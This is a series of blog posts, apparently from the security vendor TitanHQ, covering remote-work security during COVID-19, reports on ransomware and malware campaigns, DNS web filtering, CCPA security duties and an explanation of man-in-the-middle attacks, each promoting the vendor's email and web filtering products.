The massive increase in remote workers due to the 2019 Novel Coronavirus pandemic has given cybercriminals easy targets to attack, and unsurprisingly remote workers are being targeted. Remote workers are seen as low hanging fruit and attacks are far easier than when workers are in the office.
Several phishing campaigns have been detected targeting home workers that attempt to obtain email and VPN credentials. These phishing attacks are likely to increase considerably over the coming weeks and months. Attacks on VPNs have also increased, with cybercriminals exploiting unpatched vulnerabilities to steal credentials and gain access to corporate networks.
Campaigns have been detected spoofing Zoom and other videoconferencing platforms. According to Check Point, there have been 1,700 new Zoom domains registered in 2020 and 25% of those have been registered in the past two weeks. Other videoconferencing and communication platforms are also being targeted.
Addressing Cybersecurity Risks with Remote Workers
The massive increase in the number of employees working from home has increased the attack surface dramatically. Laptops, smartphones, and tablets are remotely connecting to the network, often for the very first time. It is essential that al of those devices are secured and data is appropriately protected.
Any device allowed to connect to the network remotely must have the best security software installed to protect against malware. Devices must be running the latest versions of operating systems and patches need to be applied promptly. Some studies suggest that it takes companies around 3 months on average to patch vulnerabilities. For remote workers, patching needs to be accelerated considerably and, ideally, software and operating systems should be configured to update automatically. Computers used by remote workers must also have firewalls enabled.
Ensure Home Routers are Secured
With many countries in lockdown and people being told not to leave the house, one of the biggest problem areas with remote working has been solved. The use of unsecured pubic Wi-Fi networks. When remote workers connect to unsecured public Wi-Wi networks, it is easy for cybercriminals to intercept sensitive corporate data, steal login credentials, and install malware. The Novel Coronavirus pandemic has seen remote workers abandon coffee shops and public Wi-Fi access points and stay at home; however, home Wi-Fi networks may be just as vulnerable.
Home workers will connect to the internet through consumer-grade routers, which will be far less secure than the office. Home Wi-Fi is often poorly secured and many devices that connect to Wi-Fi will have scant security controls in place. Remote workers must ensure that their home Wi-Fi network is protected with a strong password and that routers have WPA2 enabled.
Ensure Remote Workers Use a VPN and Establish a Secure Connection
It is essential for remote workers to establish a secure connection when accessing work resources and the easiest way to do this is with a virtual private network (VPN). A VPN client should be installed on all devices that you allow to remotely connect to the network.
Several vulnerabilities have been found in VPNs over the past year, and even months after patches have been released by VPN solution providers that patches have yet to be applied. Patching VPNs can be difficult when they are in use 24/7, but prompt patching is essential. There has been an increase in cyberattacks exploiting vulnerabilities in VPNs in recent weeks. In addition to ensuring the latest version of VPN clients are used and VPN solutions are patched quickly, training must be provided to remote workers to ensure they know how to use VPNs.
Ensure Multifactor Authentication Is Enabled
Strong passwords must be set to prevent brute force password guessing attempts from succeeding, but passwords alone do not provide sufficient protection for remote workers. You must ensure that multifactor authentication is enabled for all cloud services and for email accounts. If credentials are compromised in a phishing attack, it will not be possible for the credentials to be used to access accounts and sensitive data without another factor also being provided, such as a one-time code sent to an employee’s cellphone.
Security Awareness Training for Remote Workers
IT staff will be well aware that even the best security defenses can be breached as a result of the actions of employees. Employees are the weakest link in the security chain, but through security awareness training risk can be significantly reduced. Most companies will provide security awareness training to staff as part of the onboarding process, and often refresher training sessions will be provided on an annual basis. Consider increasing training for remote workers and conducting training sessions far more frequently.
The purpose of cybersecurity awareness training is to teach employees the skills they will need to recognize and avoid threats and to change the mindset of workers and create a culture of cybersecurity. Best practices for cybersecurity must be taught to prevent employees from falling prey to cyberattacks when working remotely. Employees need to be made aware of the cybersecurity risks with remote workers, which may not have been covered in training sessions when employees were only working in the office. Training remote staff should now be a priority. It is important to step up training to help remote workers identify phishing emails, spoofing, impersonation attacks, and also to teach remote workers about good IT hygiene.
Protect Against Web-Based Attacks
The dangers that come from the internet should be covered in security awareness training, but not all web-based threats are easy for remote workers to identify. Malicious adverts can be found on all manner of websites that direct users to phishing sites and websites where drive by malware downloads occur. To address cybersecurity risks for remote workers when accessing the internet, a web filtering solution should be deployed.
Cloud-based web filters are the most practical choice as they are easy to deploy, require no software downloads, and do not need to be patched or updated as that is handled by the solution provider. DNS-based filters are the best choice as they will involve no latency, which can be a major issue when bandwidth will be limited in workers’ homes.
WebTitan prevents remote workers from visiting or being redirected to known malicious websites and allows IT teams to control the types of websites that can be accessed on work devices to further reduce risk. Since WebTitan integrates with Active Directory and LDAP, IT teams can monitor the internet activity of all employees and can configure the solution to block malicious file downloads and the downloading unauthorized programs onto work devices.
It is fair to say that more people are now working from home than ever before and the number is growing rapidly due to the coronavirus pandemic. Here we explore some of the key cybersecurity challenges for remote working and suggest ways that CIOs and IT managers can reduce risk, keep their networks secure, and protect their workers.
COVID-19 and Remote Working
Even in the absence of a pandemic, an increasing number of people are working from home for at least part of the week. One study conducted by the International Workplace Group in 2018 suggests 50% of employees spend at least two and a half days a week working from home and 70% spend at least one day a week working from home.
The coronavirus pandemic is rapidly changing that. Governments around the world are recommending people work from home if they possibly can and many want to do so to reduce the risk of contracting COVID-19. With the 2019 Novel Coronavirus pandemic likely to last for several months at the very least, that is unlikely to change any time soon. Businesses will come under increasing pressure to get their employees set up for working at home.
Cybersecurity Challenges for Remote Working
For many businesses, having to set up large number of employees to work from home in such a short space of time will have come as a major shock. Rather than being able to transition gradually, the quarantine measures and social distances demanded in response to the coronavirus pandemic has given businesses and their CIOs and IT teams little time to prepare and address the cybersecurity challenges for remote working.
Some employees will already be working from home some of the time, so they will be familiar with the steps they need to take to access work networks and applications securely from home, but for a great deal of workers this will be their first time. Those workers therefore need to be trained and made aware of the additional risks, they must learn how to access work systems remotely, and the steps they need to take to do so securely.
Measures need to be considered to reduce the harm that can be caused should devices be lost or stolen, as the risk of device theft increases considerably when IT equipment is taken out of the office. Even if workers are not venturing out of the house to coffee shops, home environments may not be as safe and secure as the office.
Cyberslacking is likely to increase considerably when workers are not being directly supervised due to working at home, so loss of productivity is a real issue. Productivity losses due to people working from home is a key business concern that should be addressed. Cyber risks also increase from internet access at home.
The risk of insider threats also increases with more remote workers. Steps should be taken to reduce the potential for fraud and data theft.
It is relatively easy for organizations to effectively manage risk when users are connected to internal networks when working in the office. Doing the same when most of the workforce is working remotely is a different matter entirely. As the attack surface increases, mitigating risks and protecting against cyberthreats becomes a major challenge.
There are also issues with authentication. A known individual may be attempting to connect to the network, but it becomes harder to determine is that person is who they claim to be. Authentication measures need to be stepped up a gear.
Many businesses will be faced with the problem of simply not having enough devices to allow workers to work remotely on company-issued devices, so the decision will need to be taken about whether to allow employees to use their personal devices. Personal devices are unlikely to have the same level of protection as company-owned devices and it is much harder to control what employees do on those devices and to protect against malware that could easily be transferred onto the work network.
There is also a greater risk of shadow IT when workers are home-based. The downloading of applications and use of non-authorized tools increases risk considerably. Vulnerabilities may be introduced that can easily be exploited by cybercriminals.
Then there is the problem of having so many people accessing work networks using VPNs. Systems may not be able to cope with the increased number, which means workers will not be able to connect and work from home. IT departments must ensure there is sufficient bandwidth and licenses for VPN solutions. Those VPNs also need to be updated and patched.
These are just some of the many cybersecurity challenges for home working. The list of security concerns is very long.
Cybercriminals are Taking Advantage of a Huge Opportunity
Cybercriminals are constantly changing tactics to attack businesses and the coronavirus pandemic offers them opportunities on a silver platter. It is unsurprising that they are taking advantage. In January, phishing campaigns were launched taking advantage of fear about coronavirus. Those campaigns have increased significantly as the COVID-19 crisis has deepened. Coronavirus and COVID-19 are being used as phishing lures and to COVID-themed emails are being used to distribute malware. Cyberattacks exploiting vulnerabilities in VPNs are also increasing.
As the COVID-19 crisis worsens and lockdowns are enforced, businesses will be forced to have more workers working from home and cyberattacks are likely to continue to increase. Since shutting down the business temporarily or indefinitely simply isn’t an option for most businesses, addressing the cybersecurity challenges for remote working will soon become critical.
Addressing the Cybersecurity Challenges for Home Working
Addressing the cybersecurity challenges for home workers is likely to be difficult. Listed below are some of the steps that should be taken to prepare.
When creating new accounts for home workers, ensure strong passwords are set and use the principle of least privilege to reduce risk.
Enable two-factor authentication.
Ensure workers can connect through VPNs and there are sufficient licenses and bandwidth.
Make sure VPN software is patched and the latest version is installed. Ensure procedures are in place to keep the software updated.
Consider disabling USB ports to prevent the use of portable storage devices. This will reduce the risk of malware infections and the risk of data theft.
Ensure portable devices are protected with encryption. Use software solutions that lock devices in the event of theft or allow devices to be remotely wiped.
Ensure you set up communications channels to allow remote workers to collaborate, such as teleconferencing, chat facilities, document sharing platforms, and SaaS applications. Make sure employees are aware of what can and cannot be shared via chat apps such as Slack and Google Chat.
Ensure staff are trained on new applications, the use of VPNs, and are aware of the additional risks from remote working. Train remote workers on how to identify phishing and other cybersecurity threats.
Ensure policies and procedures are set up for reporting threats to IT security teams. Instruct employees on the correct course of action if they believe they have fallen for a scam.
Implement a DNS filter to prevent employees from accessing high risk websites on corporate-issued devices and block downloads of risky file types.
Ensure email security controls are implemented to block phishing attacks and detect and quarantine malware threats.
How TitanHQ Can Help Protecting Remote Workers and Their Devices
TitanHQ has developed two cybersecurity solutions that can help businesses protect their remote workers and their networks from email and web-based threats. Being 100% cloud-based, these solutions are just as effective when employees are working remotely as they are for office workers.
SpamTitan Cloud is a powerful email security solution that protects against the full range of email threats. SpamTitan has advanced threat detection capabilities to detect known and zero-day phishing, spear phishing, malware, botnet, and ransomware threats and ensure the threats never reach inboxes. SpamTitan Cloud also scans outbound email to detect spamming and malware distribution, as well as improving protection against insider threats through tags for sensitive data.
WebTitan Cloud is a DNS filtering solution that provides protection from web-based attacks for user working on and off the network. Being cloud based, there is no need to backhaul traffic to the office to apply filtering controls. Since the filter is DNS-based, clean, filtered internet access is provided with no latency. Controls can easily be applied to restrict access to certain types of websites to prevent cyberslacking and block cybersecurity threats and malware downloads.
Both of these solutions are easy to implement, require no local clients, and can be set up to protect your employees in minutes. They are also available on a free trial if you want to evaluate the solutions before committing to a purchase.
For further information on SpamTitan Cloud Email Security and WebTitan Cloud DNS filtering and to discover how these solutions can help to protect your business and remote workers at this extremely challenging time, give the TitanHQ team a call today.
During this unprecedented time of uncertainty, the health and safety of our employees, customers, partners and their families is one of our main focuses and concerns. Team TitanHQ are fully committed to supporting our partners and customers. The benefits from our email and web security products are even more relevant and important now.
Our fantastic team has jumped at the challenge with vigor and we have mobilized our workforce so that it’s business as usual over this unusual phase. We are taking advice from the government on best practice and have a task force in place to manage our progress.
Customers and partners can rest assured that support teams will continue to be available and product teams are working as normal. If you have any questions or concerns about products, or technical support, please contact us in the usual way. The support team has been trained to be aware of special customer concerns during this period and will escalate any question to the appropriate responsible person or department.
We are aware that this is a sensitive time and we will make sure to go the extra mile to make it easier for our customers. All of us at TitanHQ wish you good health and thank you for your continued support.
Many phishing campaigns have been detected that use the novel coronavirus as a lure and now a new ransomware variant called CoronaVirus has been detected and analyzed by MalwareHunterTeam. CoronaVirus ransomware is being distributed through a malicious website masquerading as software called WiseCleaner, a tool that can be used to clean up the registry and remove duplicate files and junk files from computers. WiseCleaner is legitimate software tool, but the website used in this campaign is fake.
It is currently unclear how traffic to the website is being generated. Campaigns such as this typically use malvertising for traffic – Malicious adverts on ad networks that direct users to malicious websites. These adverts are displayed on many legitimate websites that use third party ad networks to generate extra revenue.
If a website visitor tries to download WiseCleaner from the malicious website (The genuine website is wisecleaner.com), a file named WSHSetup.exe will be downloaded. Executing this file will download two malicious payloads: CoronaVirus ransomware and the Kpot Trojan. The Kpot Trojan is an information stealer that steals a variety of credentials, including Skype, Steam, Discord, VPN, email, and FTP passwords from a variety of different applications. The Kpot Trojan steals information such as banking credentials that have been saved in browsers and can also steal cryptowallets. The executable file also attempts to download other files, although currently only two files are downloaded. The intention may well be to download a cocktail of malware.
When CoronaVirus ransomware is downloaded and executed it encrypts a range of different file types. The encrypted files are renamed using the attacker’s email address, but the original file extension is retained. A ransom note is dropped in each folder where files are encrypted.
Interestingly, the ransom demand is very low. The attackers only charge 0.08 BTC – around $50 – for the keys to decrypt files. This suggests the ransomware component of the attack is not the main aim of the campaign which is to distribute the Kpot Trojan and potentially other malware payloads. CoronaVirus ransomware may just be a distraction.
There is currently no known decryptor for CoronaVirus ransomware and it is unclear whether the attackers can – or will – supply valid keys that allow encrypted files to be recovered.
Businesses can protect against attacks such as this by ensuring they backup all of their files regularly and store the backups offline. A web filtering solution should also be implemented to prevent malicious files from being downloaded. Web filters can be configured to prevent attempts by employees to visit malicious websites and also to block downloads of risky file types such as .exe files.
For more information on web filtering and to find out how TitanHQ’s web filtering solution, WebTitan, can help to protect your business from web-based cyberattacks, give the TitanHQ sales team a call today.
There are many ways that ransomware can be downloaded onto business networks, but most commonly, ransomware attacks occur via Remote Desktop Protocol (RDP), drive-by downloads, or email.
Scans are performed to discover organizations with open RDP ports, which are then attacked using brute force tactics to guess weak passwords. Cybercriminals also add credentials from historic data breaches to their password lists.
The best way to defense against this method of ransomware delivery is to disable RDP entirely; however, RDP is often required for remote management or remote access to virtual desktops, so this may not be an option. If RDP cannot be disabled, there are steps that should be taken to make it as secure as possible.
Use of strong passwords is important to protect against brute force attempts to guess passwords. You should follow NIST advice on creating complex passwords. Passwords must be unique and not used on any other platform. Two-factor authentication should be implemented to prevent stolen credentials from being used.
You must make sure you are running the latest software versions for servers and clients. RDP connections to listening RDP ports should only be permitted through a secure VPN, and ideally, an RDP gateway should be used. You should also restrict who is permitted to login to remote desktop. Finally, you should use rate limiting to lock users out after a set number of failed attempts to enter the correct password.
Drive-By Ransomware Downloads
Drive-by downloads occur on websites controlled by hackers, either their own sites or insecure sites that have been compromised. Malicious scripts are added to the websites that download ransomware and other malware payloads onto a user’s device when they visit the malicious webpage. This method of attack does not require any user interaction, other than visiting the malicious website. That could occur by clicking a malicious link in an email, via a redirect, or even through general web browsing.
A web filter such as WebTitan is one of the best defenses against drive-by ransomware downloads. WebTitan is a DNS filtering solution that prevents end users from visiting websites known to be malicious. Rather than connecting to the website, the user will be directed to a local block page if they attempt to visit a known malicious website. WebTitan can also be configured to block downloads of risky file types such as executable files.
Ransomware is also commonly delivered via email. This could be via an embedded hyperlink to a website where a drive-by download occurs or via malicious scripts in file attachments. Protecting against email-based attacks requires a defense in depth approach, as no single solution will provide total protection against all email attacks.
An advanced email security solution such as SpamTitan should be implemented. SpamTitan scans all inbound and outbound emails and uses a variety of techniques, including machine learning, to identify and block potentially malicious emails. SpamTitan incorporates two antivirus engines that detect known malware variants and a sandbox to analyze suspicious files for malicious actions. Sandboxing protects against never-before-seen malware and ransomware variants.
End user training is also important to ensure that in the event of a malicious email reaching an end user’s inbox, it can be recognized as such. A web filtering solution will help to ensure that any attempt to visit a malicious website via a hyperlink in an email or email attachment is blocked before ransomware is downloaded.
Ransomware as a Secondary Payload
Several ransomware operators use commodity malware to deliver their ransomware payloads. The threat actors behind DoppelPaymer ransomware have been using the Dridex banking Trojan to deliver their malicious payload, while the Ryuk ransomware gang uses the TrickBot Trojan.
Even if these commodity malware infections are discovered and removed, the ransomware gangs may still have access to systems. These commodity malware infections are often viewed as relatively trivial and when these malware variants are discovered the attacks are not properly investigated. The Trojans are removed, but the ransomware operators continue to spread laterally before deploying their ransomware payloads.
In the case of TrickBot, once it is downloaded it gets to work harvesting data such as passwords files, cookies, and other sensitive information. Once the attackers have harvested all the data they can, a reverse shell is opened to the Ryuk ransomware operators who perform recon of the network and attempt to gain administrator credentials. They then use PSExec and other Windows tools to deploy ransomware on all devices connected to the network.
That is exactly what happened with the attack on the e-discovery firm, Epiq Global. The initial TrickBot infection occurred in December 2019. Access was provided to the Ryuk operators who deployed the ransomware on February 29, 2020. Prior to the deployment of ransomware, the Ryuk operators compromised computers in all 80 of Epiq’s global offices.
TrickBot and other Trojans are primarily delivered via phishing emails. SpamTitan will help to keep you protected against these Trojans and other ransomware downloaders.
A campaign has been detected that uses alerts about out of date security certificates to fool unsuspecting web users into downloading malware. The warnings have been placed on several legitimate websites that have been compromised by cybercriminals.
When visitors arrive on the compromised websites they are presented with an error message that tells them the digital security certificate has expired and they need to download an updated one. Downloading and running the file results in malware being installed on the user’s device – The Mokes backdoor (aka Smoke Loader) and the Buerak malware downloader.
This tactic of malware distribution is nothing new. Cybercriminals have been using this method for years to fool users into downloading malware under the guide of a browser or Flash update, but this is the first time that expired website security certificate error messages have been used for malware distribution.
The NET::ERR_CERT_OUT_OF_DATE error message is delivered via an iframe that is overlaid over the website using a jquery.js script. The warning matches the size of the original page, so it is all the visitor sees when they land on the website. If they want to be able to view the content, they are told they should update their security certificate to allow the connection to the website to be made. The content of the message is loaded from a third-party web resource, but the URL displayed is of the legitimate website the user has navigated to.
It is not clear how the threat actors compromised the websites. Oftentimes websites are compromised using brute force tactics to guess weak passwords, or exploits are used for vulnerabilities that have not been patched. It is also unclear how people are being sent to the websites. Typically, traffic is sent to the compromised websites through phishing scams or malicious web adverts (malvertising), but visitors could simply navigate to the website through a Google search.
Since the warnings are appearing on legitimate websites, users may think the messages are genuine. One of the compromised websites is the official website of a zoo, another identified by Kaspersky Lab was for a legitimate auto parts dealer. The campaign has been active for at least two months.
Protecting against this method of malware distribution requires a combination of security solutions. Up-to-date anti-virus software is a must to ensure that any files downloaded to business computers are scanned for malware. A web filtering solution such as WebTitan will also provide protection by preventing users from visiting compromised websites that are being used to distribute malware and also blocking downloads of dangerous file types.
Contact TitanHQ today to find out more about web filtering and how you can protect your business from web-based attacks.
Today, February 11, is Safer Internet Day 2020 – A day where safe and positive use of digital technology is promoted around the world. Safer Internet Day started out as part of the EU SafeBorders project in 2004 but has grown into a global event with more than 150 countries participating and promoting safe use of the internet. The aim of Safer Internet Day is to help create a better and safer internet by empowering everyone to use technology responsibly, respectfully, critically, and creatively. This year’s theme is “A better internet: How to look after yourself and others.”
Everyone has a role to play in making the internet a more positive and safer environment, from seeking positive opportunities to create and connect with others, being kind and respectful to others online, and reporting illegal and inappropriate content.
Businesses that provide Wi-Fi access to their customers also have a responsibility to ensure their Wi-Fi hotspot is not abused and cannot be used to access harmful content, especially by minors. The easiest way to do that is by implementing a web filtering solution and today is the perfect day to get started.
The easiest-to-implement and most cost-effective web filtering solution is a DNS filter. A DNS filter allows content to be controlled at the DNS lookup stage of internet access, when the human-friendly domain name of a website is converted to an IP address that a computer uses to find the server hosting the website. This method of web filtering requires no hardware purchases or software downloads. You simply change your DNS record to point to your DNS filtering service provider. You then access a web-based interface and stipulate the categories of content your customers are not permitted to access. Getting started takes just a few minutes. Since all filtering takes place at the DNS level before any content is downloaded, this form of web filtering has almost zero latency, which means internet speeds are unaffected.
With WebTitan Cloud for Wi-Fi you can decide on the content that you don’t want people to access and can use the checkboxes in your user interface to block categories of web content with the click of a mouse. To make the internet family friendly, you can check the adult content checkbox to ensure pornographic material cannot be accessed through your Wi-Fi network. You can also block access to illegal websites to protect your business, such as torrents sites where copyright-infringing downloads of music, software, and films take place. Controls can also be applied to limit access to streaming websites to conserve bandwidth and make sure everyone can enjoy fast internet speeds.
WebTitan has categorized more than 500 million websites into 53 categories, including all of Alexa’s top million websites and web content in 200 languages. You can set internet content controls for different locations, different user groups, and you can manage multiple locations through a single portal.
Blacklists are a useful way to ensure unsuitable or illegal content cannot be accessed. One of the main blacklists is maintained by the Internet Watch Foundation and includes webpages and websites known to host child pornography and child abuse-related content.
Blacklists also protect Wi-Fi users from malicious content, such as phishing websites and sites hosting malware and ransomware, which can help you to protect your users and your company’s reputation.
WebTitan Cloud for Wi-Fi is ideally suited to all businesses that provide Wi-Fi access, such as:
Wireless Wi-Fi ISPs, MSPs and other Wi-Fi service providers
Cafes, coffee shops & restaurants
Retail outlets & shopping malls
Schools & universities
Health systems & hospitals
Rail & bus networks
This Safer Internet Day is the perfect time to implement a DNS filtering solution to make your Wi-Fi (or wired) network much safer for all users.
To find out more about WebTitan Cloud for Wi-Fi, WebTitan Cloud for wired networks, for a product demonstration, or to register for a free trial, contact TitanHQ today.
Spam email may be the most common method of distributing malware and phishing for sensitive information such as Office 365 credentials, but businesses also need to protect against web-based threats.
Malware and ransomware are often unwittingly downloaded from the internet by employees when browsing the internet. Hackers are constantly attacking legitimate websites and uploading malicious content, and malware-lacked files are often hosted on file sharing sites such as Dropbox and Google Drive.
Many owners of high traffic websites use third-party ad networks to bring in much needed extra revenue. Ad blocks are added to websites and the site owners earn money from the number of ad impressions or clicks. Cybercriminals often sneak malicious adverts onto these networks, and they are displayed on many high traffic websites. The malicious adverts link to websites hosting exploit kits that probe for exploitable vulnerabilities in browsers and plugins. If a vulnerability is found, it is exploited to silently download malware.
Phishing emails often have a web-based component. A hyperlink is supplied which links to a website hosting a phishing kit. An email security solution may fail to detect the hyperlink as malicious and will deliver the email. If an employee clicks the link, there may be no protection in place to prevent that site from being accessed and credentials being handed over.
There has also been an increase in malware downloads through social media websites in recent years. Research from Bromium in 2019 showed one in five companies had experienced a malware infection as a result of employees visiting social media websites and 12% of companies suffered a data breach as a result of the malware infection.
Over the summer last year, a multi-year social media campaign dubbed Operation Tripoli was uncovered. The social media malware campaign targeted users in Libya, but Facebook users in other companies were also infected with malware. Malicious code is also inserted into images which are shared on Facebook and Facebook Messenger. That code similarly downloads malware.
Businesses also face other problems from the use of social media sites by employees: A major loss in productivity. According to a Spiceworks survey, 28% of employees at large companies and 45% of employees at medium-sized companies spend four or more hours a week on personal internet usage such as visiting social media sites. The same study also revealed 38% of companies had experienced a security incident as a result of employees’ personal internet usage.
Fortunately, there is a solution that will block internet-based threats and also allow businesses to make significant productivity gains by curbing personal internet usage. Further, the solution is easy to implement, requires little maintenance, and is cost effective. That solution is WebTitan.
WebTitan is a DNS filtering solution ideally suited to SMBs and MSPs that serve the SMB market. WebTitan is a 100% cloud-based web filtering solution, so no software downloads are required and there are no hardware requirements. Simply point your DNS to WebTitan and you will be filtering the internet in minutes. You will block access to known malicious websites, be able to control what types of files can be downloaded from the internet, and you can block access to certain categories of website or filter at the web page level. Highly granular filtering means it is easy to selectively block content. WebTitan allows you to block access to social media sites or just Facebook Messenger if you wish. You can filter at the organization, user group, or individual user level and can set time-based controls.
A full suite of reports allows you to see exactly what types of sites are being accessed, who attempts to violate your policies, and you can also view internet usage in real-time.
WebTitan adds an extra layer to your security defenses that will protect you from the full range of web-based threats. By blocking phishing attacks and malware downloads and allowing you to make significant productivity gains the solution will more than pay for itself.
To find out more about web filtering with WebTitan, give the TitanHQ team a call today.
On January 1, 2020, the California Consumer Privacy Act (CCPA) took effect, giving state residents greater control over the use and sale of their personal data and introduced. In this post we explore the CCPA data security requirements for businesses and the consequences of failing to adequately protect consumer data.
What is the California Consumer Protection Act?
California already had some of the strictest privacy laws in the United States, but CCPA took consumer privacy a step further. CCPA has been likened to the EU’s General Data Protection Regulation (GDPR), as it gives California residents similar rights over the personal data collected and used by companies.
CCPA requires companies to inform California residents about the categories of data that are being collected, at or before the point of collection. There is a right to access all personal information held by a company and find out with whom personal data has been shared. Consumers have a right to opt out and prevent their personal data from being sold and can request that their personal data is deleted. Consumers also have a right to equal services and prices, and cannot be discriminated against, or denied goods or services or levels of services if they opt out of the sale of their personal data.
Who Must Comply with CCPA?
On January 1, 2020, CCPA applies to all companies that do business with California residents, regardless of where the company is based, if one of the following conditions is met:
The company generates revenues of at least $25 million each year; or
The company collects, purchases, sells, or shares the personal data of at least 50,000 people; or
The company generates at least 50% of its revenues from the sale of personal data
CCPA does not apply to insurance institutions, agents, and support organizations, which are covered by different state laws.
CCPA Data Security Requirements
CCPA does not specify what security measures need to be implemented to protect the personal data of California residents; however, businesses do have a duty to implement reasonable security measures based on the level of risk, in accordance with other state laws. Under CCPA, penalties can be applied for a “violation of the duty to implement and maintain reasonable security procedures and practices.”
Since legal action can be taken against companies over a breach of personal data, it is important for companies to ensure appropriate measures are taken to protect data and prevent data breaches.
CCPA does not specify what controls need to be implemented nor what constitutes “reasonable security procedures and practices.” A 2016 Data Breach Report released by the California Attorney General acts as a good guide. It includes a list of 20 controls that the Center for Internet Security says are requirements to protect against known cyberattack vectors. These should therefore serve as guide to the CCPA data security requirements. They are:
How TitanHQ Can Help You Comply with CCPA Data Security Requirements
Email is the most common attack vector used for phishing and malware distribution, so safeguards need to be implemented to keep email systems secure. Phishing attacks often have a web-based component where credentials are harvested, and many malware downloads occur via the internet. Internet controls are therefore also essential to protect against cyberattacks and data breaches. Due to the risk of attack via email and the web, email and browser protections are listed as the first of the foundational Center for Internet Security controls.
This is an area where TitanHQ can help. We have developed two powerful cloud-based security solutions that can help you meet CCPA data protection requirements.
SpamTitan Email Security is a powerful spam filtering solution that keeps inboxes free from email-based threats. SpamTitan incorporates multiple layers of anti-spam and anti-phishing controls, including Sender Policy Framework (SPF), DMARC, SURBL’s, RBL’s Bayesian analysis and more. SpamTitan uses twin antivirus engines to block known malware threats and sandboxing to protect against breaches and data loss from zero-day threats.
WebTitan is a cloud-based DNS filtering solution that protects against the internet component of phishing attacks and stops wired and wireless network users from accessing malicious websites. These solutions will help you meet your email and web security responsibilities and protect your organization from phishing attacks, malware and ransomware downloads. Together they will help you prevent costly data breaches and avoid the resultant CCPA fines.
Penalties for Noncompliance with CCPA
Each intentional violation carries a maximum penalty of $7,500 per record. Unintentional violations carry a penalty of $2,500 per record.
There is also a private cause of action in CCPA. In the event of a data breach, victims of the breach can sue for a CCPA violation. Statutory damages of between $100 and $750 by each California resident affected by the breach. Alternatively claims can be made for actual damages, whichever is greater, along with other relief determined by the courts. Class action lawsuits are also permitted under CCPA. The California Attorney General can also take legal action against the company rather than permitting civil suits to be filed.
TitanHQ and Pax8 have announced a new strategic partnership that will see TitanHQ’s cloud-based email security and DNS filtering solutions incorporated into the Pax8 ecosystem.
Pax8 simplifies the journey into the cloud through billing, provisioning, automation and industry-leading PSA integrations and is proven leader in cloud distribution. Pax8 has achieved position 60 in the 2019 Inc. 5000 list of the fastest growing companies and has been named CRN’s Coolest Cloud Vendor and Best in Show at the NextGen and Xchange conferences for two years in a row.
In order to have products added to the Pax8 marketplace, vendors must have developed exceptional channel friendly solutions. As the leading provider of cloud-based email and web security solutions for managed service providers (MSPs) serving the SMB marketplace, TitanHQ was an ideal fit.
Under the new partnership, Pax8 partners will have easy access to TitanHQ’s leading email security solution, SpamTitan Cloud, and can protect clients from web-based threats with WebTitan Cloud, TitanHQ’s DNS filtering solution.
These cloud-based AI-driven solutions help MSPs secure their own environments and protect their clients from malware, ransomware, botnets, viruses, and phishing and email impersonation attacks and avoid costly data breaches.
Both solutions have been developed with MSPs firmly in mind. The solutions are easy to integrate into an MSP’s security stack through TitanHQ’s APIs, there are multiple hosting options, the solutions can be supplied in white label form, and there are generous margins. Pax8 partners also benefit from a fully transparent pricing policy and industry leading technical support.
TitanHQ’s solutions have much loved by users and are consistently rated highly on business software review platforms, including G2 Crowd, Gartner Peer Insights, and Capterra.
“Our partners are excited about the addition of TitanHQ and the ability to protect their clients’ businesses by blocking malware, phishing, ransomware, and links to malicious websites from emails.” said Ryan Walsh, chief channel officer at Pax8.
You will no doubt have heard of a man in the middle (MiTM) attack. Here we define this attack method, explain how a MiTM attack occurs, and show you how to prevent a man in the middle attack and keep your devices and networks secure.
What is a Man in the Middle Attack?
Man in the middle attacks are commonly cited as a threat, but what exactly is a man in the middle attack? As the name suggests, this is a scenario where a person inserts him or herself between two communicating systems and intercepts conversations or data sent between the two. It is the computer equivalent on eavesdropping on a phone call where neither party is aware that their conversation is not private and confidential.
With a phone call, eavesdropping would allow an attacker to gather a host of sensitive information, which is divulged verbally between both parties. In this scenario, the attacker does not influence the conversation. He/she must wait until a valuable nugget of information is disclosed by either party.
A MiTM attack is concerned with intercepting data transferred between two parties. This could be data sent between a smartphone app and a server, between two parties on a messaging app such as WhatsApp, or an email conversation between two parties. It could also be communication between a user’s browser and a website.
In contrast to the telephone call scenario, which is passive, in a MiTM attack the attacker can influence what is being said. In fact, with a MiTM attack, the two people or systems communicating are not really communicating with each other. Each is communicating with the attacker.
Take email for example. Person A initiates an email conversation with Person B and requests a wire transfer to pay for services rendered. Person A supplies the bank details, and Person B agrees to the wire transfer. Various details are discussed, and the transfer is eventually made. There could be 10 or more messages sent by each party in the conversation. Each message between the two is altered by the attacker, crucially including the bank account details for the transfer. Neither party has been communicating with each other, yet both parties would be convinced they are.
Types of Man in the Middle Attack
The goal of a MiTM is to intercept information, usually for financial gain, but there are different ways that this can be achieved. Generally speaking, there are four main ways that a MiTM attack occurs: Packet sniffing, packet injection, session hijacking, and SSL stripping
Packet sniffing is one of the most common MiTM attack methods and is a type of eavesdropping or wiretapping, except it is not phone conversations that are obtained. It is packets of data sent between the two systems. Packet sniffing is much easier when sensitive data is not encrypted, such when information is disclosed between a browser and a HTTP website, rather than HTTPS where the connection is encrypted.
The above email example is a type of packet injection. Data is intercepted, but additional packets are introduced, or data packets are altered. For instance, malware could be introduced.
Session hijacking is where an attacker hijacks a session, such as a session between a browser and a banking website where the user has logged in. In this example, the attacker is the one in control of the session. SSL stripping is where a HTTPS session, which should be secure as the session is encrypted, is stripped of the encryption, turned from HTTPS to HTTP, and data is identified. This latter example is utilized by web filtering solutions that feature SSL inspection. It allows businesses to check for threats in encrypted traffic.
How to Prevent a Man in the Middle Attack
Fortunately, MiTM attacks can be difficult to perform, so the potential for an attack is limited, but there are skilled hackers who can – and do – perform these attacks and gain access to sensitive data and empty bank accounts. One of the most common examples is a coffee shop scenario where an attacker creates an evil twin hotspot. When a user connects to this evil twin – a Wi-Fi network set up to look like the genuine coffee shop Wi-Fi hotspot – all data sent between their browser and the website is intercepted.
There are several steps you can take to prevent a Man in the Middle Attack.
Never disclose sensitive data when connected to an untrusted public Wi-Fi network. Only ever connect via a VPN, and ideally wait until you are on a trusted Wi-Fi network to access online bank accounts.
Ensure the website is protected by an SSL certificate (starts with HTTPS). Bear in mind that hackers also use SSL certificates, so HTTPS does not mean a website is genuine.
Do not use hyperlinks included in emails, always visit the website directly by typing the correct URL into your browser or finding the correct URL through a Google search.
Do not install unauthorized software, apps from third-party app stores, and do not download and use pirated software.
Businesses should implement a DNS filtering solution to protect their workers and prevent them from visiting malicious websites.
Make sure your networks are secured and have appropriate security tools installed.
Disable insecure SSL/TLS protocols on your website (Only TLS 1.1 and TLS 1.2 should be enabled) and implement HSTS.
